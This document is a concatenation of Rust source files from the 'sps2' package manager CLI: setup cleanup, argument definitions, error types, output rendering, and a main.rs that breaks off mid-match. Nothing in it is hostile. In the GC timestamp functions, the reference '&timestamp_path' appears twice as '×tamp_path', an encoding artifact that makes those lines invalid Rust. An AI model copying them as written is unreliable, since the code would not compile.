async fn clean_orphaned_staging(&self) -> Result<(), CliError> {
let states_dir = Path::new(fixed_paths::STATES_DIR);
if !states_dir.exists() {
return Ok(());
}
let mut entries = tokio::fs::read_dir(states_dir)
.await
.map_err(|e| CliError::Setup(format!("Failed to read states directory: {e}")))?;
let mut cleaned = 0;
let state_manager = self.state.as_ref().unwrap();
while let Some(entry) = entries
.next_entry()
.await
.map_err(|e| CliError::Setup(format!("Failed to read directory entry: {e}")))?
{
let file_name = entry.file_name();
if let Some(name) = file_name.to_str() {
if name.starts_with("staging-") {
// Extract staging ID from directory name
if let Some(id_str) = name.strip_prefix("staging-") {
if let Ok(staging_id) = uuid::Uuid::parse_str(id_str) {
// Only remove if it's safe to do so
match state_manager.can_remove_staging(&staging_id).await {
Ok(true) => {
debug!("Removing orphaned staging directory: {}", name);
if let Err(e) = tokio::fs::remove_dir_all(entry.path()).await {
warn!(
"Failed to remove orphaned staging directory {}: {}",
name, e
);
} else {
cleaned += 1;
}
}
Ok(false) => {
debug!("Staging directory {} is still in use, skipping", name);
}
Err(e) => {
warn!("Failed to check if staging directory {} can be removed: {}", name, e);
}
}
}
}
}
}
}
if cleaned > 0 {
info!("Cleaned {} orphaned staging directories", cleaned);
}
Ok(())
}
/// Read the last GC timestamp from file
async fn read_last_gc_timestamp(&self) -> Result<u64, CliError> {
let timestamp_path = self.gc_timestamp_path();
let content = tokio::fs::read_to_string(×tamp_path)
.await
.map_err(|e| CliError::Setup(format!("Failed to read GC timestamp: {e}")))?;
content
.trim()
.parse::<u64>()
.map_err(|e| CliError::Setup(format!("Invalid GC timestamp format: {e}")))
}
/// Write the current timestamp as the last GC time
async fn write_last_gc_timestamp(&self) -> Result<(), CliError> {
let timestamp_path = self.gc_timestamp_path();
let now = std::time::SystemTime::now()
.duration_since(std::time::UNIX_EPOCH)
.unwrap_or_default()
.as_secs();
tokio::fs::write(×tamp_path, now.to_string())
.await
.map_err(|e| CliError::Setup(format!("Failed to write GC timestamp: {e}")))?;
debug!("Updated GC timestamp: {}", now);
Ok(())
}
/// Get the path to the GC timestamp file
fn gc_timestamp_path(&self) -> PathBuf {
Path::new(fixed_paths::LAST_GC_TIMESTAMP).to_path_buf()
}
/// Update GC timestamp - public static method for ops crate
pub async fn update_gc_timestamp_static() -> Result<(), CliError> {
let timestamp_path = std::path::Path::new(fixed_paths::LAST_GC_TIMESTAMP);
let now = std::time::SystemTime::now()
.duration_since(std::time::UNIX_EPOCH)
.unwrap_or_default()
.as_secs();
tokio::fs::write(timestamp_path, now.to_string())
.await
.map_err(|e| CliError::Setup(format!("Failed to write GC timestamp: {e}")))?;
Ok(())
}
}
| rust | BSD-3-Clause | a357a9ae7317314ef1605ce29b66f064bd6eb510 | 2026-01-04T20:17:02.345249Z | false |
alexykn/sps2 | https://github.com/alexykn/sps2/blob/a357a9ae7317314ef1605ce29b66f064bd6eb510/apps/sps2/src/cli.rs | apps/sps2/src/cli.rs | //! Command line interface definition
use clap::{Parser, Subcommand};
use sps2_types::ColorChoice;
use std::path::PathBuf;
use uuid::Uuid;
/// sps2 - Modern package manager for macOS ARM64
#[derive(Parser)]
#[command(name = "sps2")]
#[command(version = env!("CARGO_PKG_VERSION"))]
#[command(about = "Modern package manager for macOS ARM64")]
#[command(long_about = None)]
pub struct Cli {
#[command(subcommand)]
pub command: Commands,
#[command(flatten)]
pub global: GlobalArgs,
}
/// Global arguments available for all commands
#[derive(clap::Args)]
pub struct GlobalArgs {
/// Output in JSON format
#[arg(long, global = true)]
pub json: bool,
/// Enable debug logging to /opt/pm/logs/
#[arg(long, global = true)]
pub debug: bool,
/// Color output control
#[arg(long, global = true, value_enum)]
pub color: Option<ColorChoice>,
/// Use alternate config file
#[arg(long, global = true, value_name = "PATH")]
pub config: Option<PathBuf>,
/// Use alternate builder config file
#[arg(long, global = true, value_name = "PATH")]
pub builder_config: Option<PathBuf>,
/// Show what would be done without executing (like ansible --check)
#[arg(long, global = true)]
pub check: bool,
}
/// Available commands
#[derive(Subcommand)]
pub enum Commands {
/// Install packages from repository or local files
#[command(alias = "i")]
Install {
/// Package specifications (name, name>=version, or ./file.sp)
packages: Vec<String>,
/// Force re-download even if package exists in cache
#[arg(long)]
force_download: bool,
},
/// Update packages to newer compatible versions
#[command(alias = "up")]
Update {
/// Specific packages to update (empty = all packages)
packages: Vec<String>,
},
/// Upgrade packages to latest versions (ignore upper bounds)
#[command(alias = "ug")]
Upgrade {
/// Specific packages to upgrade (empty = all packages)
packages: Vec<String>,
},
/// Uninstall packages
#[command(alias = "rm")]
Uninstall {
/// Package names to uninstall
packages: Vec<String>,
},
/// Build package from YAML recipe
Build {
/// Path to recipe file (.yaml or .yml)
recipe: PathBuf,
/// Output directory for .sp file
#[arg(short, long)]
output_dir: Option<PathBuf>,
/// Allow network access during build
#[arg(long)]
network: bool,
/// Number of parallel build jobs (0=auto)
#[arg(short, long)]
jobs: Option<usize>,
// Compression-related flags are removed until fully supported
},
/// Package from staging directory without rebuilding
#[command(alias = "p")]
#[command(group(
clap::ArgGroup::new("pack_source")
.required(true)
.args(&["recipe", "directory"]),
))]
Pack {
/// Path to recipe file (.yaml or .yml)
#[arg(short = 'r', long = "recipe")]
recipe: Option<PathBuf>,
/// Path to a directory to package directly (skips post-processing)
#[arg(short = 'd', long = "directory")]
directory: Option<PathBuf>,
/// Path to a manifest.toml file (requires --directory)
#[arg(short = 'm', long, requires = "directory")]
// require directory when manifest is used
manifest: Option<PathBuf>,
// SBOM flag removed (soft disable): previously --sbom/-s (optional when using --directory)
/// Skip post-processing steps and QA pipeline (only with --recipe)
#[arg(short = 'n', long = "no-post", requires = "recipe")]
no_post: bool,
/// Output directory for .sp file
#[arg(short, long)]
output_dir: Option<PathBuf>,
},
/// List installed packages
#[command(alias = "ls")]
List,
/// Show information about a package
Info {
/// Package name
package: String,
},
/// Search for packages
#[command(alias = "find")]
Search {
/// Search query
query: String,
},
/// Sync repository index
#[command(alias = "sync")]
Reposync {
/// Automatically trust new keys
#[clap(long)]
yes: bool,
},
/// Clean up orphaned packages and old states
Cleanup,
/// Rollback to previous state
Rollback {
/// Target state ID (empty = previous state)
state_id: Option<Uuid>,
},
/// Show state history
History {
/// Show all states (no availability filtering)
#[arg(long)]
all: bool,
/// Verify availability by checking CAS contents on disk
#[arg(long)]
verify: bool,
/// Limit number of states for --verify (overrides config)
#[arg(long, requires = "verify")]
limit: Option<usize>,
},
/// Check system health
#[command(name = "check-health")]
CheckHealth,
// Audit command soft-disabled (entire variant commented out)
/*
/// Audit temporarily disabled
#[command(hide = true, about = "Audit temporarily disabled")]
Audit {
/// Scan all packages (default: all)
#[arg(long)]
all: bool,
/// Scan specific package
#[arg(long, value_name = "NAME")]
package: Option<String>,
/// Fail on critical vulnerabilities
#[arg(long)]
fail_on_critical: bool,
/// Minimum severity to report (low, medium, high, critical)
#[arg(long, value_name = "SEVERITY")]
severity: Option<String>,
},
*/
/// Update sps2 to the latest version
#[command(name = "self-update")]
SelfUpdate {
/// Skip signature verification (not recommended)
#[arg(long)]
skip_verify: bool,
/// Force update even if already on latest version
#[arg(long)]
force: bool,
},
/// Verify and optionally heal the current state
Verify {
/// Automatically heal any discrepancies found
#[arg(long)]
heal: bool,
/// Verification level (quick, standard, full)
#[arg(long, default_value = "standard")]
level: String,
/// Verification scope (live, store, all)
#[arg(long, default_value = "live")]
scope: String,
/// Synchronize DB refcounts from the active state after verification/heal
/// (one-off maintenance; does not change persistent config)
#[arg(long)]
sync_refcounts: bool,
},
/// Manage repositories
#[command(subcommand)]
Repo(RepoCommands),
/// Manage trusted signing keys
#[command(subcommand)]
Keys(KeysCommands),
}
/// Repository management subcommands
#[derive(Subcommand)]
pub enum RepoCommands {
/// Add a new repository
Add {
/// A unique name for the repository
#[clap(required = true)]
name: String,
/// The URL of the repository
#[clap(required = true)]
url: String,
},
/// List configured repositories
List,
/// Remove a repository by name
Remove {
/// Repository name (e.g., fast, slow, stable, or extras key)
name: String,
},
}
/// Key management subcommands
#[derive(Subcommand)]
pub enum KeysCommands {
/// List trusted signing keys
List,
/// Import a Minisign public key (.pub or base64)
Import {
/// Path to Minisign public key (.pub or text file containing base64)
file: PathBuf,
/// Optional comment to store with the key
#[arg(long)]
comment: Option<String>,
},
/// Remove a trusted key by key ID
Remove {
/// Minisign key ID (hex)
key_id: String,
},
}
impl Commands {}
| rust | BSD-3-Clause | a357a9ae7317314ef1605ce29b66f064bd6eb510 | 2026-01-04T20:17:02.345249Z | false |
alexykn/sps2 | https://github.com/alexykn/sps2/blob/a357a9ae7317314ef1605ce29b66f064bd6eb510/apps/sps2/src/error.rs | apps/sps2/src/error.rs | //! CLI error handling
use std::fmt;
use sps2_errors::UserFacingError;
/// CLI-specific error type
#[derive(Debug)]
pub enum CliError {
/// Configuration error
Config(sps2_errors::ConfigError),
/// Operations error
Ops(sps2_errors::Error),
/// System setup error
Setup(String),
/// Invalid command arguments
InvalidArguments(String),
/// I/O error
Io(std::io::Error),
}
impl fmt::Display for CliError {
fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
match self {
CliError::Config(e) => write!(f, "Configuration error: {e}"),
CliError::Ops(e) => {
let message = e.user_message();
write!(f, "{message}")?;
if let Some(code) = e.user_code() {
write!(f, "\n Code: {code}")?;
}
if let Some(hint) = e.user_hint() {
write!(f, "\n Hint: {hint}")?;
}
if e.is_retryable() {
write!(f, "\n Retry: safe to retry this operation.")?;
}
Ok(())
}
CliError::Setup(msg) => write!(f, "System setup error: {msg}"),
CliError::InvalidArguments(msg) => write!(f, "Invalid arguments: {msg}"),
CliError::Io(e) => write!(f, "I/O error: {e}"),
}
}
}
impl std::error::Error for CliError {
fn source(&self) -> Option<&(dyn std::error::Error + 'static)> {
match self {
CliError::Config(e) => Some(e),
CliError::Ops(e) => Some(e),
CliError::Io(e) => Some(e),
_ => None,
}
}
}
impl From<sps2_errors::ConfigError> for CliError {
fn from(e: sps2_errors::ConfigError) -> Self {
CliError::Config(e)
}
}
impl From<sps2_errors::Error> for CliError {
fn from(e: sps2_errors::Error) -> Self {
CliError::Ops(e)
}
}
impl From<std::io::Error> for CliError {
fn from(e: std::io::Error) -> Self {
CliError::Io(e)
}
}
| rust | BSD-3-Clause | a357a9ae7317314ef1605ce29b66f064bd6eb510 | 2026-01-04T20:17:02.345249Z | false |
alexykn/sps2 | https://github.com/alexykn/sps2/blob/a357a9ae7317314ef1605ce29b66f064bd6eb510/apps/sps2/src/display.rs | apps/sps2/src/display.rs | //! Output rendering and formatting
use comfy_table::{presets::UTF8_FULL, Attribute, Cell, Color, ContentArrangement, Table};
use console::{Style, Term};
use sps2_ops::{
BuildReport, HealthCheck, HealthStatus, InstallReport, IssueSeverity, OperationResult,
PackageInfo, PackageStatus, SearchResult, StateInfo,
};
use sps2_types::ColorChoice;
use std::io;
/// Output renderer for CLI results
#[derive(Clone)]
pub struct OutputRenderer {
/// Use JSON output format
json_output: bool,
/// Color configuration
color_choice: ColorChoice,
/// Terminal instance
term: Term,
}
impl OutputRenderer {
/// Create new output renderer
pub fn new(json_output: bool, color_choice: ColorChoice) -> Self {
Self {
json_output,
color_choice,
term: Term::stdout(),
}
}
/// Render operation result
pub fn render_result(&self, result: &OperationResult) -> io::Result<()> {
if self.json_output {
self.render_json(result)
} else {
self.render_table(result)
}
}
/// Render as JSON
fn render_json(&self, result: &OperationResult) -> io::Result<()> {
let json = result.to_json().map_err(io::Error::other)?;
println!("{json}");
Ok(())
}
/// Render as formatted table
fn render_table(&self, result: &OperationResult) -> io::Result<()> {
match result {
OperationResult::PackageList(packages) => self.render_package_list(packages),
OperationResult::PackageInfo(info) => self.render_package_info(info),
OperationResult::SearchResults(results) => self.render_search_results(results),
OperationResult::InstallReport(report) => self.render_install_report(report),
OperationResult::BuildReport(report) => self.render_build_report(report),
OperationResult::StateInfo(info) => self.render_state_info(info),
OperationResult::StateHistory(history) => self.render_state_history(history),
OperationResult::HealthCheck(health) => self.render_health_check(health),
OperationResult::Success(message) => self.render_success_message(message),
OperationResult::Report(report) => self.render_op_report(report),
OperationResult::VerificationResult(result) => self.render_verification_result(result),
}
}
fn render_verification_result(&self, result: &sps2_ops::VerificationResult) -> io::Result<()> {
if self.json_output {
println!(
"{}",
serde_json::to_string_pretty(result).map_err(io::Error::other)?
);
return Ok(());
}
if result.is_valid {
println!("[OK] State verification passed.");
} else {
println!(
"[ERROR] State verification failed with {} discrepancies:",
result.discrepancies.len()
);
for discrepancy in &result.discrepancies {
println!(" - {discrepancy:?}");
}
}
Ok(())
}
/// Render package list
fn render_package_list(&self, packages: &[PackageInfo]) -> io::Result<()> {
if packages.is_empty() {
println!("No packages installed.");
return Ok(());
}
let mut table = Table::new();
table
.load_preset(UTF8_FULL)
.set_content_arrangement(ContentArrangement::Dynamic);
// Add headers
table.set_header(vec![
Cell::new("Package").add_attribute(Attribute::Bold),
Cell::new("Version").add_attribute(Attribute::Bold),
Cell::new("Status").add_attribute(Attribute::Bold),
Cell::new("Description").add_attribute(Attribute::Bold),
]);
// Add package rows
for package in packages {
let status_cell = self.format_package_status(&package.status);
let version_str = package
.version
.as_ref()
.map(|v| v.to_string())
.unwrap_or_else(|| "-".to_string());
table.add_row(vec![
Cell::new(&package.name),
Cell::new(version_str),
status_cell,
Cell::new(package.description.as_deref().unwrap_or("-")),
]);
}
println!("{table}");
Ok(())
}
/// Render package information
fn render_package_info(&self, info: &PackageInfo) -> io::Result<()> {
println!("{}", self.style_package_name(&info.name));
println!();
// Basic information
if let Some(description) = &info.description {
println!("Description: {description}");
}
if let Some(version) = &info.version {
println!("Installed: {version}");
}
if let Some(available) = &info.available_version {
println!("Available: {available}");
}
println!(
"Status: {}",
self.format_package_status_text(&info.status)
);
if let Some(license) = &info.license {
println!("License: {license}");
}
if let Some(homepage) = &info.homepage {
println!("Homepage: {homepage}");
}
// Dependencies
if !info.dependencies.is_empty() {
println!();
println!("Dependencies:");
for dep in &info.dependencies {
println!(" • {dep}");
}
}
// Size information
if let Some(size) = info.size {
println!();
println!("Size: {}", format_size(size));
}
Ok(())
}
/// Render search results
fn render_search_results(&self, results: &[SearchResult]) -> io::Result<()> {
if results.is_empty() {
println!("No packages found.");
return Ok(());
}
let mut table = Table::new();
table
.load_preset(UTF8_FULL)
.set_content_arrangement(ContentArrangement::Dynamic);
table.set_header(vec![
Cell::new("Package").add_attribute(Attribute::Bold),
Cell::new("Version").add_attribute(Attribute::Bold),
Cell::new("Installed").add_attribute(Attribute::Bold),
Cell::new("Description").add_attribute(Attribute::Bold),
]);
for result in results {
let installed_text = if result.installed { "Yes" } else { "No" };
let installed_cell = if result.installed {
Cell::new(installed_text).fg(Color::Green)
} else {
Cell::new(installed_text)
};
table.add_row(vec![
Cell::new(&result.name),
Cell::new(result.version.to_string()),
installed_cell,
Cell::new(result.description.as_deref().unwrap_or("-")),
]);
}
println!("{table}");
Ok(())
}
/// Render installation report
fn render_install_report(&self, report: &InstallReport) -> io::Result<()> {
let total_changes = report.installed.len() + report.updated.len() + report.removed.len();
if total_changes == 0 {
println!("No changes made.");
return Ok(());
}
// Summary
println!("Installation Summary");
println!();
if !report.installed.is_empty() {
println!("Installed ({}):", report.installed.len());
for change in &report.installed {
let version = change
.to_version
.as_ref()
.map(|v| v.to_string())
.unwrap_or_else(|| "unknown".to_string());
println!(" • {} {}", change.name, version);
}
println!();
}
if !report.updated.is_empty() {
println!("Updated ({}):", report.updated.len());
for change in &report.updated {
let from = change
.from_version
.as_ref()
.map(|v| v.to_string())
.unwrap_or_else(|| "unknown".to_string());
let to = change
.to_version
.as_ref()
.map(|v| v.to_string())
.unwrap_or_else(|| "unknown".to_string());
println!(" • {} {} → {}", change.name, from, to);
}
println!();
}
if !report.removed.is_empty() {
println!("Removed ({}):", report.removed.len());
for change in &report.removed {
let version = change
.from_version
.as_ref()
.map(|v| v.to_string())
.unwrap_or_else(|| "unknown".to_string());
println!(" • {} {}", change.name, version);
}
println!();
}
println!("Completed in {}ms", report.duration_ms);
println!("State: {}", report.state_id);
Ok(())
}
/// Render build report
fn render_build_report(&self, report: &BuildReport) -> io::Result<()> {
println!("Build Summary");
println!();
println!("Package: {} {}", report.package, report.version);
println!("Output: {}", report.output_path.display());
println!("Duration: {}ms", report.duration_ms);
// SBOM output removed (soft disable): previously displayed report.sbom_generated
Ok(())
}
/// Render state information
fn render_state_info(&self, info: &StateInfo) -> io::Result<()> {
println!("State Information");
println!();
println!("ID: {}", info.id);
println!("Current: {}", if info.current { "Yes" } else { "No" });
println!(
"Created: {}",
info.timestamp.format("%Y-%m-%d %H:%M:%S UTC")
);
println!("Operation: {}", info.operation);
println!("Packages: {}", info.package_count);
if let Some(parent) = info.parent {
println!("Parent: {parent}");
}
if !info.changes.is_empty() {
println!();
println!("Changes:");
for change in &info.changes {
match change.change_type {
sps2_ops::ChangeType::Install => {
let version = change
.new_version
.as_ref()
.map(|v| v.to_string())
.unwrap_or_else(|| "unknown".to_string());
println!(" + {} {}", change.package, version);
}
sps2_ops::ChangeType::Update => {
let old_version = change
.old_version
.as_ref()
.map(|v| v.to_string())
.unwrap_or_else(|| "unknown".to_string());
let new_version = change
.new_version
.as_ref()
.map(|v| v.to_string())
.unwrap_or_else(|| "unknown".to_string());
println!(" ~ {} {} → {}", change.package, old_version, new_version);
}
sps2_ops::ChangeType::Remove => {
let old_version = change
.old_version
.as_ref()
.map(|v| v.to_string())
.unwrap_or_else(|| "unknown".to_string());
println!(" - {} {}", change.package, old_version);
}
sps2_ops::ChangeType::Downgrade => {
let old_version = change
.old_version
.as_ref()
.map(|v| v.to_string())
.unwrap_or_else(|| "unknown".to_string());
let new_version = change
.new_version
.as_ref()
.map(|v| v.to_string())
.unwrap_or_else(|| "unknown".to_string());
println!(" ↓ {} {} → {}", change.package, old_version, new_version);
}
}
}
}
Ok(())
}
/// Render state history
fn render_state_history(&self, history: &[StateInfo]) -> io::Result<()> {
if history.is_empty() {
println!("No state history found.");
return Ok(());
}
let mut table = Table::new();
table
.load_preset(UTF8_FULL)
.set_content_arrangement(ContentArrangement::Dynamic);
table.set_header(vec![
Cell::new("State ID").add_attribute(Attribute::Bold),
Cell::new("Current").add_attribute(Attribute::Bold),
Cell::new("Operation").add_attribute(Attribute::Bold),
Cell::new("Created").add_attribute(Attribute::Bold),
Cell::new("Packages").add_attribute(Attribute::Bold),
]);
for state in history {
let current_cell = if state.current {
Cell::new("*")
.fg(Color::Green)
.add_attribute(Attribute::Bold)
} else {
Cell::new("")
};
table.add_row(vec![
Cell::new(state.id.to_string()),
current_cell,
Cell::new(&state.operation),
Cell::new(state.timestamp.format("%Y-%m-%d %H:%M").to_string()),
Cell::new(state.package_count.to_string()),
]);
}
println!("{table}");
Ok(())
}
/// Render health check results
fn render_health_check(&self, health: &HealthCheck) -> io::Result<()> {
let overall_icon = if health.healthy { "[OK]" } else { "[ERROR]" };
println!("{overall_icon} System Health Check");
println!();
// Component status table
let mut table = Table::new();
table
.load_preset(UTF8_FULL)
.set_content_arrangement(ContentArrangement::Dynamic);
table.set_header(vec![
Cell::new("Component").add_attribute(Attribute::Bold),
Cell::new("Status").add_attribute(Attribute::Bold),
Cell::new("Duration").add_attribute(Attribute::Bold),
Cell::new("Message").add_attribute(Attribute::Bold),
]);
for component in health.components.values() {
let status_cell = match component.status {
HealthStatus::Healthy => Cell::new("Healthy").fg(Color::Green),
HealthStatus::Warning => Cell::new("Warning").fg(Color::Yellow),
HealthStatus::Error => Cell::new("Error").fg(Color::Red),
};
table.add_row(vec![
Cell::new(&component.name),
status_cell,
Cell::new(format!("{}ms", component.check_duration_ms)),
Cell::new(&component.message),
]);
}
println!("{table}");
// Issues
if !health.issues.is_empty() {
println!();
println!("Issues Found:");
for issue in &health.issues {
let severity_icon = match issue.severity {
IssueSeverity::Low => "[INFO]",
IssueSeverity::Medium => "[WARN]",
IssueSeverity::High => "[HIGH]",
IssueSeverity::Critical => "[CRITICAL]",
};
println!(
"{severity_icon} {} ({}): {}",
issue.component,
format!("{:?}", issue.severity).to_lowercase(),
issue.description
);
if let Some(suggestion) = &issue.suggestion {
println!(" {suggestion}");
}
println!();
}
}
Ok(())
}
/// Render success message
fn render_success_message(&self, message: &str) -> io::Result<()> {
println!("{message}");
Ok(())
}
/// Render operation report
fn render_op_report(&self, report: &sps2_ops::OpReport) -> io::Result<()> {
let icon = if report.success { "[OK]" } else { "[ERROR]" };
println!("{icon} {} Report", report.operation);
println!();
println!("Summary: {}", report.summary);
println!("Duration: {}ms", report.duration_ms);
if !report.changes.is_empty() {
println!();
println!("Changes:");
for change in &report.changes {
match change.change_type {
sps2_ops::ChangeType::Install => {
let version = change
.new_version
.as_ref()
.map(|v| v.to_string())
.unwrap_or_else(|| "unknown".to_string());
println!(" + {} {}", change.package, version);
}
sps2_ops::ChangeType::Update => {
let old_version = change
.old_version
.as_ref()
.map(|v| v.to_string())
.unwrap_or_else(|| "unknown".to_string());
let new_version = change
.new_version
.as_ref()
.map(|v| v.to_string())
.unwrap_or_else(|| "unknown".to_string());
println!(" ~ {} {} → {}", change.package, old_version, new_version);
}
sps2_ops::ChangeType::Remove => {
let old_version = change
.old_version
.as_ref()
.map(|v| v.to_string())
.unwrap_or_else(|| "unknown".to_string());
println!(" - {} {}", change.package, old_version);
}
sps2_ops::ChangeType::Downgrade => {
let old_version = change
.old_version
.as_ref()
.map(|v| v.to_string())
.unwrap_or_else(|| "unknown".to_string());
let new_version = change
.new_version
.as_ref()
.map(|v| v.to_string())
.unwrap_or_else(|| "unknown".to_string());
println!(" ↓ {} {} → {}", change.package, old_version, new_version);
}
}
}
}
Ok(())
}
/// Format package status as colored cell
fn format_package_status(&self, status: &PackageStatus) -> Cell {
match status {
PackageStatus::Installed => Cell::new("Installed").fg(Color::Green),
PackageStatus::Outdated => Cell::new("Outdated").fg(Color::Yellow),
PackageStatus::Available => Cell::new("Available").fg(Color::Blue),
PackageStatus::Local => Cell::new("Local").fg(Color::Magenta),
}
}
/// Format package status as text
fn format_package_status_text(&self, status: &PackageStatus) -> String {
match status {
PackageStatus::Installed => "Installed".to_string(),
PackageStatus::Outdated => "Update available".to_string(),
PackageStatus::Available => "Available".to_string(),
PackageStatus::Local => "Local".to_string(),
}
}
/// Style package name
fn style_package_name(&self, name: &str) -> String {
if self.supports_color() {
Style::new().bold().apply_to(name).to_string()
} else {
name.to_string()
}
}
/// Check if color output is supported
fn supports_color(&self) -> bool {
match self.color_choice {
ColorChoice::Always => true,
ColorChoice::Never => false,
ColorChoice::Auto => self.term.features().colors_supported(),
}
}
}
/// Format byte size in human readable format
fn format_size(bytes: u64) -> String {
const UNITS: &[&str] = &["B", "KB", "MB", "GB", "TB"];
let mut size = bytes as f64;
let mut unit_index = 0;
while size >= 1024.0 && unit_index < UNITS.len() - 1 {
size /= 1024.0;
unit_index += 1;
}
if unit_index == 0 {
format!("{size:.0} {}", UNITS[unit_index])
} else {
format!("{size:.1} {}", UNITS[unit_index])
}
}
| rust | BSD-3-Clause | a357a9ae7317314ef1605ce29b66f064bd6eb510 | 2026-01-04T20:17:02.345249Z | false |
alexykn/sps2 | https://github.com/alexykn/sps2/blob/a357a9ae7317314ef1605ce29b66f064bd6eb510/apps/sps2/src/main.rs | apps/sps2/src/main.rs | #![warn(mismatched_lifetime_syntaxes)]
//! sps2 - Modern package manager for macOS ARM64
//!
//! This is the main CLI application that orchestrates all package management
//! operations through the ops crate.
mod cli;
mod display;
mod error;
mod events;
mod logging;
mod setup;
use crate::cli::{Cli, Commands, KeysCommands};
use crate::display::OutputRenderer;
use crate::error::CliError;
use crate::events::EventHandler;
use crate::setup::SystemSetup;
use clap::Parser;
use sps2_config::{fixed_paths, Config};
use sps2_events::{EventReceiver, EventSender};
use sps2_ops::{OperationResult, OpsContextBuilder};
use sps2_state::StateManager;
use sps2_types::state::TransactionPhase;
use std::process;
use tokio::select;
use tracing::{error, info, warn};
#[tokio::main]
async fn main() {
// Parse command line arguments first to check for JSON mode
let cli = Cli::parse();
let json_mode = cli.global.json;
// Initialize tracing with JSON awareness
init_tracing(json_mode, cli.global.debug);
// Run the application and handle errors
if let Err(e) = run(cli).await {
error!("Application error: {}", e);
if !json_mode {
eprintln!("Error: {e}");
}
process::exit(1);
}
}
/// Main application logic
async fn run(cli: Cli) -> Result<(), CliError> {
info!("Starting sps2 v{}", env!("CARGO_PKG_VERSION"));
// Load configuration with proper precedence:
// 1. Start with file config (or defaults)
let mut config =
Config::load_or_default_with_builder(&cli.global.config, &cli.global.builder_config)
.await?;
// 2. Merge environment variables
config.merge_env()?;
// 3. Apply CLI flags (highest precedence)
apply_cli_config(&mut config, &cli.global, &cli.command)?;
// Initialize system setup
let mut setup = SystemSetup::new(config.clone());
// Perform startup checks and initialization
setup.initialize().await?;
// --- RECOVERY LOGIC ---
// Check for and complete any interrupted transactions
if let Err(e) = recover_if_needed(setup.state()).await {
error!("CRITICAL ERROR: A previous operation was interrupted and could not be automatically recovered: {}", e);
if !cli.global.json {
eprintln!("CRITICAL ERROR: A previous operation was interrupted and could not be automatically recovered: {e}");
eprintln!("The package manager is in a potentially inconsistent state. Please report this issue.");
}
return Err(e);
}
// --- END RECOVERY LOGIC ---
// Create event channel
let (event_sender, event_receiver) = sps2_events::channel();
// Build operations context
let ops_ctx = build_ops_context(
&setup,
event_sender.clone(),
config.clone(),
cli.global.check,
)
.await?;
// Create output renderer
let renderer = OutputRenderer::new(
cli.global.json,
cli.global.color.unwrap_or(config.general.color),
);
// Create event handler
let colors_enabled = match cli.global.color.unwrap_or(config.general.color) {
sps2_types::ColorChoice::Always => true,
sps2_types::ColorChoice::Never => false,
sps2_types::ColorChoice::Auto => console::Term::stdout().features().colors_supported(),
};
let mut event_handler = EventHandler::new(colors_enabled, cli.global.debug);
// Execute command with event handling
let result =
execute_command_with_events(cli.command, ops_ctx, event_receiver, &mut event_handler)
.await?;
// Render final result
renderer.render_result(&result)?;
// Show PATH reminder if this was an install operation and PATH not set
if matches!(result, OperationResult::InstallReport(_)) {
show_path_reminder_if_needed();
}
info!("Command completed successfully");
Ok(())
}
/// Execute command with concurrent event handling
async fn execute_command_with_events(
command: Commands,
ops_ctx: sps2_ops::OpsCtx,
mut event_receiver: EventReceiver,
event_handler: &mut EventHandler,
) -> Result<OperationResult, CliError> {
let mut command_future = Box::pin(execute_command(command, ops_ctx));
// Handle events concurrently with command execution
loop {
select! {
// Command completed
result = &mut command_future => {
// Drain any remaining events
while let Ok(event) = event_receiver.try_recv() {
event_handler.handle_event(event);
}
return result;
}
// Event received
event = event_receiver.recv() => {
match event {
Some(event) => event_handler.handle_event(event),
None => { /* Channel closed: keep waiting for command to finish */ }
}
}
}
}
}
/// Execute the specified command
async fn execute_command(
command: Commands,
ctx: sps2_ops::OpsCtx,
) -> Result<OperationResult, CliError> {
match command {
// Small operations (implemented in ops crate)
Commands::Reposync { yes } => {
let result = sps2_ops::reposync(&ctx, yes).await?;
Ok(OperationResult::Success(result))
}
Commands::Repo(repo_cmd) => match repo_cmd {
cli::RepoCommands::Add { name, url } => {
let result = sps2_ops::small_ops::add_repo(&ctx, &name, &url).await?;
Ok(OperationResult::Success(result))
}
cli::RepoCommands::List => {
let result = sps2_ops::small_ops::list_repos(&ctx).await?;
Ok(OperationResult::Success(result))
}
cli::RepoCommands::Remove { name } => {
let result = sps2_ops::small_ops::remove_repo(&ctx, &name).await?;
Ok(OperationResult::Success(result))
}
},
Commands::Keys(keys_cmd) => match keys_cmd {
KeysCommands::List => {
let result = sps2_ops::keys::keys_list(&ctx).await?;
Ok(OperationResult::Success(result))
}
KeysCommands::Import { file, comment } => {
let result = sps2_ops::keys::keys_import_from_file(&ctx, &file, comment).await?;
Ok(OperationResult::Success(result))
}
KeysCommands::Remove { key_id } => {
let result = sps2_ops::keys::keys_remove(&ctx, &key_id).await?;
Ok(OperationResult::Success(result))
}
},
Commands::List => {
let packages = sps2_ops::list_packages(&ctx).await?;
Ok(OperationResult::PackageList(packages))
}
Commands::Info { package } => {
let info = sps2_ops::package_info(&ctx, &package).await?;
Ok(OperationResult::PackageInfo(info))
}
Commands::Search { query } => {
let results = sps2_ops::search_packages(&ctx, &query).await?;
Ok(OperationResult::SearchResults(results))
}
Commands::Cleanup => {
let result = sps2_ops::cleanup(&ctx).await?;
// Also update the GC timestamp through SystemSetup (best effort)
if let Err(e) = crate::setup::SystemSetup::update_gc_timestamp_static().await {
tracing::warn!("Failed to update GC timestamp: {}", e);
}
Ok(OperationResult::Success(result))
}
Commands::Rollback { state_id } => {
let state_info = sps2_ops::rollback(&ctx, state_id).await?;
Ok(OperationResult::StateInfo(state_info))
}
Commands::History { all, verify, limit } => {
let history = sps2_ops::history(&ctx, all, verify, limit).await?;
Ok(OperationResult::StateHistory(history))
}
Commands::CheckHealth => {
let health = sps2_ops::check_health(&ctx).await?;
Ok(OperationResult::HealthCheck(health))
}
// Large operations (delegate to specialized crates)
Commands::Install {
packages,
force_download,
} => {
let report = sps2_ops::install(&ctx, &packages, force_download).await?;
Ok(OperationResult::InstallReport(report))
}
Commands::Update { packages } => {
let report = sps2_ops::update(&ctx, &packages).await?;
Ok(OperationResult::InstallReport(report))
}
Commands::Upgrade { packages } => {
let report = sps2_ops::upgrade(&ctx, &packages).await?;
Ok(OperationResult::InstallReport(report))
}
Commands::Uninstall { packages } => {
let report = sps2_ops::uninstall(&ctx, &packages).await?;
Ok(OperationResult::InstallReport(report))
}
Commands::Build {
recipe,
output_dir,
network,
jobs,
} => {
let output_path = output_dir.as_deref();
let report = sps2_ops::build(&ctx, &recipe, output_path, network, jobs).await?;
Ok(OperationResult::BuildReport(report))
}
Commands::Pack {
recipe,
directory,
manifest,
